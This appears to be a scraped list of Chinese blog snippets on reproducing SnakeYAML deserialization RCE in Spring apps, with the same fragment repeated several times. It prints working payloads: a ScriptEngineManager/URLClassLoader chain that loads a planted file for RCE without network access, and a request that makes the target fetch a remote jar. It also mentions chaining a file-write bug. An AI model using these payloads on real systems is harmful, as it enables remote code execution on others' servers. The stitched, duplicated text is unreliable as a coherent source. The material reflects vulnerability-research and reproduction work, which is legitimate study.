7. refresh 接口刷新spring配置,触发rce 8.弹出画画板(我的计算器坏了) 总结:看了很多文章分析,整了好几天。我复现的思路没有像参考文章一样本地分析跟踪代码,更偏向于利用过程的记录和踩坑。 参考链接: https://github.com/LandGrey/SpringBootVulExploit //漏洞总结 https://b1ngz.github.io/exploit-spring...
可以看到成功执行了jar包代码里面写的命令 接下来在java-sec-code里面复现一下 地址是 http://localhost:9127/rce/vuln/yarm 这里就直接是load 传进来的content,是我们可控的的序列化点 直接带上paylaod试一下,ok 成功rce!! 0x03漏洞分析 还是简单跟进流程分析一下 在load处下断点 然后跟进到Yaml.class文件中 ...
第二步加载写入的恶意文件完成不出网RCE PoC !javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["file:///tmp/yaml-payload.txt"]]] 这里的话比如ruoyi,是有一个写文件的漏洞,也可以直接利用该漏洞去写入文件,不一定是jar格式,jpg、png、txt都可以。 个人感觉如果有C3P0...
yaml反序列化时可以通过!!+全类名指定反序列化的类,反序列化过程中会实例化该类,可以通过构造ScriptEngineManagerpayload并利用SPI机制通过URLClassLoader或者其他payload如JNDI方式远程加载实例化恶意类从而实现任意代码执行。 漏洞复现 网上最多的一个PoC就是基于javax.script.ScriptEngineManager的利用链通过URLClassLoader...
RCE 如果存在任意文件写入的话,即构造一个恶意类,并添加到classpath下,导致代码执行 此时将将SPI1中say方法的内容改为calc,当运行后则会造成代码执行 流程分析 SPI的核心的逻辑是ServiceLoader.load()方法,在ServiceLoader中,存储了默认路径META-INF/services ...
第二步加载写入的恶意文件完成不出网RCE PoC !javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["file:///tmp/yaml-payload.txt"]]] 这里的话比如ruoyi,是有一个写文件的漏洞,也可以直接利用该漏洞去写入文件,不一定是jar格式,jpg、png、txt都可以。 366...
第二步加载写入的恶意文件完成不出网RCEPoC !javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["file:///tmp/yaml-payload.txt"]]]这里的话比如ruoyi,是有一个写文件的漏洞,也可以直接利用该漏洞去写入文件,不一定是jar格式,jpg、png、txt都可以。个人感觉如果有C3P0的时候更...
第二步加载写入的恶意文件完成不出网RCE PoC !javax.script.ScriptEngineManager [!!java.net.URLClassLoader[[!!java.net.URL ["file:///tmp/yaml-payload.txt"]]] 这里的话比如ruoyi,是有一个写文件的漏洞,也可以直接利用该漏洞去写入文件,不一定是jar格式,jpg、png、txt都可以。 个人...
/** * http://localhost:8080/rce/vuln/yarm?content=!!javax.script.ScriptEngineManager%20[!!java.net.URLClassLoader%20[[!!java.net.URL%20[%22http://test.joychou.org:8086/yaml-payload.jar%22]]] * yaml-payload.jar: https://github.com/artsploit/yaml-payload * * @param content payload...
第二步加载写入的恶意文件完成不出网RCE PoC !javax.script.ScriptEngineManager[!!java.net.URLClassLoader[[!!java.net.URL["file:///tmp/yaml-payload.txt"]]] 这里的话比如ruoyi,是有一个写文件的漏洞,也可以直接利用该漏洞去写入文件,不一定是jar格式,jpg、png、txt都可以。 个人...